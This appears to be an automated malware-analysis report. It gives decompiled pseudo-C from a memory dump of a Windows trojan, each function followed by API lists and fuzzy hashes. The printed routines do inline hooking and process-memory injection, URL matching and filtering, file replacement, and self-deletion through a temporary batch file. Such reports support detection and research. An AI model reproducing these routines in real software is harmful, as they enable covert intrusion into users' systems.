        				_t225 =  *0x423e70;
        				if( *0x423e70 == 0 ||  *0x423e6c == 0) {
        					_t240 = _a4;
        				} else {
        					_t240 = _a4;
        					_t230 = 0;
        					if(E00414802(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
        						_t210 = E00409D57();
        						_v20 = _t210;
        						if(_t210 != 0) {
        							_t214 = E004148BC(0, 4,  &_v20,  *0x423e6c);
        							_push(_v20);
        							if(_t214 == 0) {
        								E0040C1C2();
        							}
        							E00409DC2(_t225);
        						}
        						E0040C1C2( *0x423e6c);
        						E0040C1C2( *0x423e70);
        						 *0x423e6c = _t217;
        						 *0x423e70 = _t217;
        					}
        				}
        				LeaveCriticalSection(0x423e54);
        				_t128 =  *((intOrPtr*)(_t240 + 0x40));
        				_t254 = _t128 - _t217;
        				if(_t128 == _t217) {
        					L38:
        					if((_v16 & 0x00000001) == 0) {
        						_t187 =  *((intOrPtr*)(_t240 + 0x44));
        						_t272 = _t187 - _t217;
        						if(_t187 != _t217 && E00414ABD(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
        							_v16 = _v16 | 0x00000001;
        						}
        					}
        					if( *(_t240 + 0x20) >= 0x21) {
        						_t182 = 0x10;
        						E004128A5(_t182,  &_v72);
        						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
        						if(E0040C233( &_v72, _t238, 0x21) == 0) {
        							_t186 =  *((intOrPtr*)(_t238 + 0x21));
        							if(_t186 == 0x3b || _t186 == 0) {
        								_v16 = _v16 | 0x00000010;
        							}
        						}
        					}
        					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
        					_v24 = _t217;
        					if(_t129 == _t217 ||  *_t129 == _t217) {
        						L52:
        						_t130 =  *((intOrPtr*)(_t240 + 0x34));
        						__eflags = _t130 - _t217;
        						if(_t130 == _t217) {
        							goto L60;
        						}
        						__eflags =  *_t130;
        						if( *_t130 == 0) {
        							goto L60;
        						}
        						_t167 = 0x12;
        						E004128DB(_t167,  &_v168);
        						_t172 = E0040CF30( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
        						_t247 = _t247 + 0xc;
        						goto L55;
        					} else {
        						_t176 =  *((intOrPtr*)(_t240 + 0x30));
        						if(_t176 == _t217 ||  *_t176 == _t217) {
        							goto L52;
        						} else {
        							_t177 = 0x11;
        							E004128DB(_t177,  &_v272);
        							_push( *((intOrPtr*)(_a4 + 0x30)));
        							_t172 = E0040CF30( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
        							_t247 = _t247 + 0x10;
        							L55:
        							if(_t172 > _t217) {
        								_t174 = E0040D571(_v24, _t172 + _t172);
        								if( *0x423e74 != _t174) {
        									_t64 =  &_v16;
        									 *_t64 = _v16 | 0x00000020;
        									__eflags =  *_t64;
        									 *0x423e74 = _t174;
        								} else {
        									E0040C1C2(_v24);
        									_v24 = _t217;
        								}
        							}
        							_t240 = _a4;
        							L60:
        							if(_v9 != 0xff) {
        								__eflags = _v9 - 1;
        								if(_v9 != 1) {
        									L67:
        									if((_v16 & 0x00000008) == 0) {
        										L93:
        										E0040C1C2(_v24);
        										_t218 = _v16;
        										if((_t218 & 0x00000001) == 0) {
        											if(E00414B25(_t230, _t240) != 0) {
        												_t218 = _t218 | 0x00000002;
        											}
        											if((_t218 & 0x00000010) != 0 && E00414EDF(_t240, _t230) != 0) {
        												_t218 = _t218 | 0x00000004;
        											}
        										}
        										return _t218;
        									}
        									_t136 =  *(_t240 + 0x28);
        									_t219 = 0;
        									if( *(_t240 + 0x28) != 0) {
        										__eflags = _v16 & 0x00000010;
        										if((_v16 & 0x00000010) == 0) {
        											__eflags =  *(_t240 + 0x20);
        											if( *(_t240 + 0x20) != 0) {
        												L92:
        												_v16 = _v16 & 0xfffffff7;
        												goto L93;
        											}
        											_t233 =  &_v36;
        											_t137 = 0xc;
        											E004128A5(_t137, _t233);
        											_push(_t233);
        											_push(9);
        											L81:
        											_pop(_t140);
        											_v20 = E0040C620(_t140);
        											L82:
        											if(_v20 == 0) {
        												goto L92;
        											}
        											E00409F6A( &_v32);
        											_t144 = E0040C402( *(_t240 + 0xc), 0,  *(_t240 + 8));
        											_t235 = _t144;
        											if(_t144 != 0) {
        												_t230 = 0x3c;
        												E0040C275( &_v160,  &_v160, 0, _t230);
        												_v160 = _t230;
        												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
        													_t152 = 0xa;
        													E004128DB(_t152,  &_v272);
        													_t154 = 0xd;
        													E004128DB(_t154,  &_v60);
        													_t227 =  *(_a4 + 0x10);
        													_t156 = 0x4019b0;
        													_t230 =  ==  ? 0x4019b0 : _v24;
        													_t244 =  ==  ? 0x4019b0 : _v32;
        													if(_t227 == 0) {
        														_t227 = "-";
        													}
        													if((_v16 & 0x00000001) != 0) {
        														_t156 =  &_v60;
        													}
        													_push(_v20);
        													_push(_t230);
        													_push(_t244);
        													_push(_t227);
        													_push(_t156);
        													_t161 = E00409404(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
        													_t240 = _a4;
        													_t219 = _t161;
        												}
        												E0040C1C2(_t235);
        											}
        											E0040C1C2(_v32);
        											E0040C1C2(_v20);
        											if(_t219 != 0) {
        												goto L93;
        											} else {
        												goto L92;
        											}
        										}
        										_t230 = E0040C620(_t136,  *((intOrPtr*)(_t240 + 0x24)));
        										_v20 = _t230;
        										__eflags = _t230;
        										if(_t230 == 0) {
        											goto L92;
        										}
        										_t163 = 0;
        										__eflags =  *(_t240 + 0x28);
        										if( *(_t240 + 0x28) <= 0) {
        											goto L82;
        										} else {
        											goto L73;
        										}
        										do {
        											L73:
        											_t228 =  *((intOrPtr*)(_t163 + _t230));
        											__eflags = _t228 - 0x26;
        											if(_t228 != 0x26) {
        												__eflags = _t228 - 0x2b;
        												if(_t228 == 0x2b) {
        													 *((char*)(_t163 + _t230)) = 0x20;
        												}
        											} else {
        												 *((char*)(_t163 + _t230)) = 0xa;
        											}
        											_t163 = _t163 + 1;
        											__eflags = _t163 -  *(_t240 + 0x28);
        										} while (_t163 <  *(_t240 + 0x28));
        										goto L82;
        									}
        									_t236 =  &_v36;
        									_t164 = 0xb;
        									E004128A5(_t164, _t236);
        									_push(_t236);
        									_push(7);
        									goto L81;
        								}
        								L66:
        								_v16 = _v16 | 0x00000008;
        								goto L67;
        							}
        							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
        								if((_v16 & 0x00000020) == 0) {
        									goto L67;
        								}
        							}
        							goto L66;
        						}
        					}
        				}
        				_t189 = E00411D2E( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
        				_t225 = _v32;
        				_v20 = _t189;
        				if(E0040D054(_t189, _v32) == 0) {
        					L37:
        					E0040C1C2(_v20);
        					_t217 = 0;
        					goto L38;
        				} else {
        					_t239 = _v20;
        					do {
        						_t225 = _t239 + 1;
        						if( *_t225 == 0) {
        							goto L36;
        						}
        						_t194 =  *_t239;
        						if(_t194 == 0x21) {
        							L22:
        							_t239 = _t225;
        							L23:
        							_t230 = 0;
        							_t225 = _t239;
        							if(E00414802(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
        								goto L36;
        							}
        							_t197 = _t224;
        							if(_t197 == 0) {
        								_v9 = 0;
        								L35:
        								if(_t224 != 2) {
        									goto L37;
        								}
        								goto L36;
        							}
        							_t198 = _t197 - 1;
        							if(_t198 == 0) {
        								L30:
        								_v9 = 1;
        								goto L35;
        							}
        							_t199 = _t198 - 1;
        							if(_t199 == 0) {
        								_t230 = 0x3c;
        								E0040C275( &_v96,  &_v96, 0, 0);
        								_v80 =  &_v536;
        								_v96 = 0;
        								_v76 = 0x103;
        								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
        								__eflags = _t204 - 1;
        								if(_t204 == 1) {
        									__eflags = _v76;
        									if(_v76 > 0) {
        										E00409F24( &_v536);
        									}
        								}
        								goto L35;
        							}
        							_t207 = _t199 - 1;
        							if(_t207 == 0 || _t207 == 1) {
        								_v16 = _v16 | 0x00000001;
        								goto L30;
        							} else {
        								goto L35;
        							}
        						}
        						if(_t194 == 0x2d) {
        							goto L22;
        						}
        						if(_t194 == 0x40) {
        							goto L22;
        						}
        						if(_t194 == 0x5e) {
        							_t224 = 4;
        							goto L22;
        						} else {
        							_t224 = 0;
        							goto L23;
        						}
        						L36:
        						_t239 = E0040D092(_t239, 1);
        					} while (_t239 != 0);
        					goto L37;
        				}
        			}

        APIs
        • EnterCriticalSection.KERNEL32(00423E54,-004223DC,00000000,004223C0), ref: 004150E8
        • LeaveCriticalSection.KERNEL32(00423E54), ref: 0041516B
        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00415236
        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00415470
          • Part of subcall function 00409D57: CreateMutexW.KERNEL32(004238D8,00000000,00422918,00423E54,?,?,00415119,00000000,00000000), ref: 00409D7F
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
        • String ID: $T>B
        • API String ID: 4018265435-2584829405
        • Opcode ID: 0b603687b0ced278c429ddb86ea6dedb9f57962babd8018416775380410b76f3
        • Instruction ID: 7916633256d4ec4063803f8b8ec0302a62f5915c5345939eecd1e5fa739cc736
        • Opcode Fuzzy Hash: 0b603687b0ced278c429ddb86ea6dedb9f57962babd8018416775380410b76f3
        • Instruction Fuzzy Hash: 52D1DF31E00A09EEDF219BA1C845BEF7BB6AF81304F14456BE851A7291C7B89DC5CF19
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E00408D5C(WCHAR* __ecx, signed char* _a4) {
        				char _v268;
        				char _v793;
        				signed short _v856;
        				signed short _v1048;
        				char _v1052;
        				short _v1572;
        				short _v1576;
        				intOrPtr _v1580;
        				signed char* _v1584;
        				signed int _v1588;
        				char* _v1592;
        				void* _v1596;
        				intOrPtr _v1600;
        				intOrPtr _v1604;
        				char _v1608;
        				intOrPtr _v1612;
        				signed int _v1616;
        				signed int _v1620;
        				void* _v1621;
        				signed int _v1624;
        				void* __ebx;
        				void* __esi;
        				signed int _t60;
        				signed int _t69;
        				signed int _t71;
        				signed int _t72;
        				signed int _t80;
        				signed int _t83;
        				long _t84;
        				long _t85;
        				signed int _t89;
        				signed int _t101;
        				signed int _t108;
        				signed int _t110;
        				WCHAR* _t123;
        				signed char _t125;
        				signed char* _t131;
        				signed int _t134;
        				void* _t136;
        				void* _t140;
        				signed int _t141;
        
        				_t128 = __ecx;
        				_t131 = _a4;
        				_t60 = E0041317B(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
        				_v1620 = _t60;
        				if(_t60 != 0) {
        					_v1596 =  *0x423d64;
        					_v1592 =  &_v268;
        					_v1604 = E00408BB8;
        					_v1600 = E00408CF4;
        					_v1584 = _t131;
        					E0041341A( &_v1052);
        					E0040C1FE( &_v268,  &_v793, 0x102);
        					_t69 =  *_t131 & 0x000000ff;
        					__eflags = _t69;
        					if(_t69 == 0) {
        						_t71 = _v1048 >> 0x10;
        						__eflags = _t71;
        						_v1620 = _t71;
        						_t72 = _v1048 & 0x0000ffff;
        						goto L7;
        					} else {
        						__eflags = _t69 == 1;
        						if(_t69 == 1) {
        							_v1620 = _v856 >> 0x10;
        							_t72 = _v856 & 0x0000ffff;
        							L7:
        							_v1616 = _t72;
        						}
        					}
        					_v1620 = _v1620 * 0xea60;
        					_v1616 = _v1616 * 0xea60;
        					E0040C275( &_v1052,  &_v1052, 0, 0x310);
        					_v1584 = 0;
        					_t80 = E004132A1();
        					__eflags = _t80;
        					if(_t80 != 0) {
        						do {
        							__eflags =  *_t131;
        							_v1621 = 1;
        							if( *_t131 != 0) {
        								L24:
        								_t83 = E00407996();
        								_t138 = _t83;
        								__eflags = _t83;
        								if(__eflags == 0) {
        									goto L29;
        								} else {
        									_v1620 = E00411D2E(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
        									E0040C1C2(_t138);
        									__eflags = _v1624;
        									if(_v1624 == 0) {
        										_t131 = _a4;
        										goto L33;
        									} else {
        										_v1588 = _v1588 & 0;
        										_t108 = E0040897C(_t128, _t129,  &_v1588, 1);
        										_t131 = _a4;
        										__eflags = _t108;
        										if(_t108 == 0) {
        											L33:
        											_t125 = _v1621;
        										} else {
        											_t131[8] = _t131[8] | 0xffffffff;
        											_t110 = E00409179( &_v1608);
        											__eflags = _t110;
        											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
        											E0041215B( &(_t131[8]));
        											E0040C1C2(_v1588);
        										}
        									}
        									E0040C1C2(_v1608);
        									__eflags = _t125 - 2;
        									if(_t125 != 2) {
        										__eflags = _t125;
        										if(_t125 != 0) {
        											goto L29;
        										} else {
        											_t84 = _v1620;
        										}
        									} else {
        										_t84 = _v1616;
        									}
        								}
        							} else {
        								asm("sbb ebx, ebx");
        								E0040883B( !( ~(_v1572 & 0x0000ffff)) &  &_v1572, _t128, 0);
        								_t123 =  &(_t131[0x122]);
        								_t89 = GetFileAttributesW( &_v1576);
        								__eflags = _t89 - 0xffffffff;
        								if(_t89 == 0xffffffff) {
        									_t89 = GetFileAttributesW(0x422468);
        									__eflags = _t89 - 0xffffffff;
        									if(_t89 == 0xffffffff) {
        										goto L29;
        									} else {
        										_t128 = 0x422468;
        										goto L14;
        									}
        								} else {
        									_t128 =  &_v1572;
        									L14:
        									_t129 = _t123;
        									E0040C563(_t89 | 0xffffffff, _t128, _t129);
        									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
        									__eflags = _t140 - 0xffffffff;
        									if(_t140 == 0xffffffff) {
        										L28:
        										E0041151D(_t123);
        										goto L29;
        									} else {
        										_v1584 = E004114F6(_t128, _t140);
        										_t134 = _t129;
        										CloseHandle(_t140);
        										__eflags = _v1584 - 0xffffffff;
        										if(_v1584 != 0xffffffff) {
        											L17:
        											__eflags = _t134;
        											if(__eflags > 0) {
        												goto L28;
        											} else {
        												if(__eflags < 0) {
        													L20:
        													__eflags = lstrcmpiW(_t123,  &_v1572);
        													if(__eflags == 0) {
        														goto L24;
        													} else {
        														_t141 = E0041317B(_t128, __eflags, 0x8793aef2, 2);
        														__eflags = _t141;
        														if(_t141 == 0) {
        															L29:
        															_t131 = _a4;
        															_t84 = 0x7530;
        														} else {
        															_t101 = MoveFileExW(_t123,  &_v1572, 0xb);
        															__eflags = _t101;
        															if(_t101 == 0) {
        																goto L29;
        															} else {
        																E0040F995(_t141);
        																__eflags = _t101 | 0xffffffff;
        																_t128 =  &_v1576;
        																_t129 = _t123;
        																E0040C563(_t101 | 0xffffffff,  &_v1576, _t123);
        																goto L24;
        															}
        														}
        													}
        												} else {
        													__eflags = _v1580 - 0xffffffff;
        													if(_v1580 > 0xffffffff) {
        														goto L28;
        													} else {
        														goto L20;
        													}
        												}
        											}
        										} else {
        											__eflags = _t134;
        											if(_t134 == 0) {
        												goto L28;
        											} else {
        												goto L17;
        											}
        										}
        									}
        								}
        							}
        							_t85 = WaitForSingleObject( *0x423d64, _t84);
        							__eflags = _t85 - 0x102;
        						} while (_t85 == 0x102);
        					}
        					E0040F995(_v1612);
        					_t136 = 0;
        				} else {
        					_t136 = 1;
        				}
        				E0040C1C2(_t131);
        				return _t136;
        			}

        APIs
          • Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C
        • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000310,?,?,00000102), ref: 00408EA4
        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408EDD
        • CloseHandle.KERNEL32(00000000,00000000), ref: 00408EFB
        • lstrcmpiW.KERNEL32(?,?), ref: 00408F2B
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
        • String ID:
        • API String ID: 503543330-0
        • Opcode ID: 123243a5903a440c18414cbfd2b022419503c27b3576a7719beab0a6e08d846a
        • Instruction ID: 0dacff0a541982b94828aaa51f1b351be360e2f01db44290586e4793eaa5d24b
        • Opcode Fuzzy Hash: 123243a5903a440c18414cbfd2b022419503c27b3576a7719beab0a6e08d846a
        • Instruction Fuzzy Hash: 9271E031508341ABD720EF34C981A6BB7E9AF85354F140A3EF5D4B62D2DB38D9058B8A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E004109FE(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
        				char _v8;
        				DWORD* _v12;
        				intOrPtr _v47;
        				void _v48;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* __ebp;
        				void* _t47;
        				void* _t58;
        				intOrPtr _t61;
        				void* _t62;
        				void* _t63;
        				intOrPtr* _t66;
        				long _t68;
        				DWORD* _t69;
        				void* _t71;
        
        				_t63 = __edx;
        				_t61 = __ecx;
        				_t58 = __eax;
        				_t69 = 0;
        				_v12 = 0;
        				if(E004109B9(_a4) < 0x1e) {
        					L18:
        					return _v12;
        				}
        				_t3 =  &_v8; // 0x412d29
        				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
        					goto L18;
        				}
        				E0040C275( &_v48,  &_v48, 0xffffff90, 0x23);
        				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
        					L17:
        					_t30 =  &_v8; // 0x412d29
        					_t31 =  &_v8; // 0x412d29
        					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t31, _t30);
        					goto L18;
        				} else {
        					_t66 =  &_v48;
        					_push(0);
        					_push(_t66);
        					while(1) {
        						_t47 = E0041D900(_t58, _t61, _t63, _t66, _t69);
        						if(_t47 == 0xffffffff) {
        							break;
        						}
        						_t69 = _t69 + _t47;
        						if(_t69 > 0x1e) {
        							L16:
        							goto L17;
        						}
        						_t61 =  *_t66;
        						if(_t61 == 0xe9 || _t61 == 0xe8) {
        							if(_t47 == 5) {
        								 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
        							}
        						}
        						_push(0);
        						if(_t69 >= 5) {
        							_t17 = _t69 + 5; // 0x5
        							_t68 = _t17;
        							 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
        							 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
        							if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
        								_t62 = _a4;
        								_v48 = 0xe9;
        								_v47 = _t58 - _t62 - 5;
        								E0041D345(_t62, _a8);
        								if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
        									_v12 = _t68;
        								}
        							}
        							goto L16;
        						}
        						_t66 = _t71 + _t69 - 0x2c;
        						_push(_t66);
        					}
        					goto L16;
        				}
        			}

        APIs
          • Part of subcall function 004109B9: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0041D2E5,00000000,00000000,00000034,0041D670,00422008,00000000), ref: 004109CE
        • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,)-A,-00000008,00000034,?,?,0041D406,?,00000000,?,?,0041D670,00422008), ref: 00410A2B
        • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0041D406,?,00000000,?,?,0041D670), ref: 00410A52
        • WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 00410ACC
        • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00410AF4
        • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,)-A,)-A,?,?,0041D406,?,00000000,?,?,0041D670,00422008,00000000,00412D29), ref: 00410B0C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
        • String ID: )-A
        • API String ID: 390532180-3912011668
        • Opcode ID: 380f36af9b4bfb47285306e4499a1026238ca51f7e9324b1cbe9584085735a7d
        • Instruction ID: 40d891acf0eda6f0c55417b00496234f40c715e507e30207fa65c75dee0536b0
        • Opcode Fuzzy Hash: 380f36af9b4bfb47285306e4499a1026238ca51f7e9324b1cbe9584085735a7d
        • Instruction Fuzzy Hash: 1C316072900259AADF109FB9CD84EDE7B69AF19370F108316F935A61D0C6B4D9C08B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E004131B6(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
        				char _v5;
        				void _v12;
        				void _t26;
        				void _t43;
        				void* _t51;
        				void* _t52;
        
        				_t52 = __esi;
        				_t51 = __edi;
        				_t26 = E00410B1B( *0x4238b4, __edi);
        				_v12 = _t26;
        				if(_t26 != 0) {
        					_v5 = 0;
        					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
        						_v5 = 1;
        					}
        					_a8 = _a8 |  *0x4238a0 & 0x00000014;
        					_push(_t52);
        					if(WriteProcessMemory(_t51, 0x4238a0 -  *0x4238b4 + _v12,  &_a8, 4, 0) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(WriteProcessMemory(_t51, 0x4238b4 -  *0x4238b4 + _v12,  &_v12, 4, 0) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(E0041298C(0x423d64, _t51, _v12,  *0x423d64) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(E0041298C(0x423d68, _t51, _v12,  *0x423d68) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(_v5 == 0) {
        						_t43 = _v12;
        					} else {
        						VirtualFreeEx(_t51, _v12, 0, 0x8000);
        						goto L1;
        					}
        				} else {
        					L1:
        					_t43 = 0;
        				}
        				return _t43;
        			}

        APIs
          • Part of subcall function 00410B1B: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 00410B37
        • DuplicateHandle.KERNEL32(000000FF,0001FEE6,00000000,0001FEE6,00000000,00000000,00000002,00000000,00000000,?,?,?,0041D70F,?,00000000,?), ref: 004131E8
        • WriteProcessMemory.KERNEL32(00000000,0001FEE6,?,00000004,00000000,?,?,?,?,0041D70F,?,00000000,?,?,0041D8A7,?), ref: 0041321F
        • WriteProcessMemory.KERNEL32(00000000,0001FEE6,0001FEE6,00000004,00000000,?,?,?,0041D70F,?,00000000,?,?,0041D8A7,?,?), ref: 0041323F
        • VirtualFreeEx.KERNEL32(00000000,0001FEE6,00000000,00008000,00000000,0001FEE6,00000000,0001FEE6,?,?,0041D70F,?,00000000,?,?,0041D8A7), ref: 0041328E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
        • String ID: d=B$h=B
        • API String ID: 2215616122-3823919649
        • Opcode ID: bc32e26d24aa22d70f2c77264d37951103fc2bddabc51842d4e071a7b4bd53e9
        • Instruction ID: 20d3752369f00b665c8adad5772c1c905fca975fa0b81cd73bb5f3365143e57c
        • Opcode Fuzzy Hash: bc32e26d24aa22d70f2c77264d37951103fc2bddabc51842d4e071a7b4bd53e9
        • Instruction Fuzzy Hash: 8121E671704249BADF11AFA8DD81FEEBFB8EB19349F444095F600E7111D3799B468B28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E0040DC82(void* __ebx, void* __edi, char _a4) {
        				short _v24;
        				intOrPtr _v28;
        				char _v72;
        				short _v592;
        				char _v852;
        				char _v1392;
        				void* _t35;
        				char _t56;
        
        				if(E0041153E(L"bat",  &_v592) == 0) {
        					L7:
        					return 0;
        				}
        				CharToOemW( &_v592,  &_v852);
        				_push( &_v852);
        				if(E0040CF86( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
        					L6:
        					E0041151D( &_v592);
        					goto L7;
        				}
        				_t35 = E00411372( &_v592, _a4, _t31);
        				E0040C1C2(_a4);
        				if(_t35 == 0) {
        					goto L6;
        				}
        				_push(__edi);
        				_push( &_v592);
        				if(E0040CEB5( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
        					goto L6;
        				} else {
        					_t56 = 0x44;
        					E0040C275( &_v72,  &_v72, 0, _t56);
        					_v24 = 0;
        					_v72 = _t56;
        					_v28 = 1;
        					return E0040DA89( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
        				}
        			}

        APIs
          • Part of subcall function 0041153E: GetTempPathW.KERNEL32(000000F6,?), ref: 00411555
        • CharToOemW.USER32 ref: 0040DCB2
          • Part of subcall function 00411372: CreateFileW.KERNEL32(0040DC9C,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 0041138C
          • Part of subcall function 00411372: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113AF
          • Part of subcall function 00411372: CloseHandle.KERNEL32(00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113BC
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 0040DD36
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
        • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
        • API String ID: 1639923935-3344086482
        • Opcode ID: 1b0b96e96e54bdb7cb7c206b3389acfec892e2d96021c0099daf533f19ebf529
        • Instruction ID: 4453817e2855f3db5f3f3c386b6341654c80ee38f9c4eefc85701f18fa5c9e9c
        • Opcode Fuzzy Hash: 1b0b96e96e54bdb7cb7c206b3389acfec892e2d96021c0099daf533f19ebf529
        • Instruction Fuzzy Hash: 54218272901109AADB10EBA4CC85FEF77ADDF04314F104277B908F20D1D6789A898F68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00404E69(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
        				void* _v8;
        				long _v12;
        				void* _v16;
        				char _v32;
        				void _v360;
        				short _v880;
        				void* __edi;
        				void* __esi;
        				void* _t18;
        				void* _t25;
        				void* _t26;
        				long _t39;
        				void* _t42;
        				void* _t44;
        				long _t47;
        
        				_t48 =  &_v32;
        				_t18 = 0x2b;
        				_v16 = __edx;
        				_t44 = __ecx;
        				E004128DB(_t18,  &_v32);
        				if(E00411A47(_t48,  &_v880, _t44) == 0) {
        					L11:
        					return 1;
        				}
        				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
        				_v8 = _t25;
        				if(_t25 == 0xffffffff) {
        					goto L11;
        				}
        				_t26 = 0x30;
        				_t39 = 0;
        				E004128A5(_t26,  &_v360);
        				_t9 =  &_v8; // 0x404e51
        				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
        					L9:
        					FlushFileBuffers(_v8);
        					CloseHandle(_v8);
        					if(_t39 == 0) {
        						E0041151D( &_v880);
        					}
        					goto L11;
        				} else {
        					_t42 = _v16;
        					if(_t42 == 0) {
        						L7:
        						_t39 = 1;
        						goto L9;
        					}
        					_t47 = E0040CCFF(_t42);
        					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
        						_t39 = 0;
        						goto L9;
        					} else {
        						goto L7;
        					}
        				}
        			}

        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00404EB4
        • WriteFile.KERNEL32(QN@,?,00000146,?,00000000,00000000), ref: 00404EF2
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404F16
        • FlushFileBuffers.KERNEL32(?), ref: 00404F2A
        • CloseHandle.KERNEL32(?), ref: 00404F33
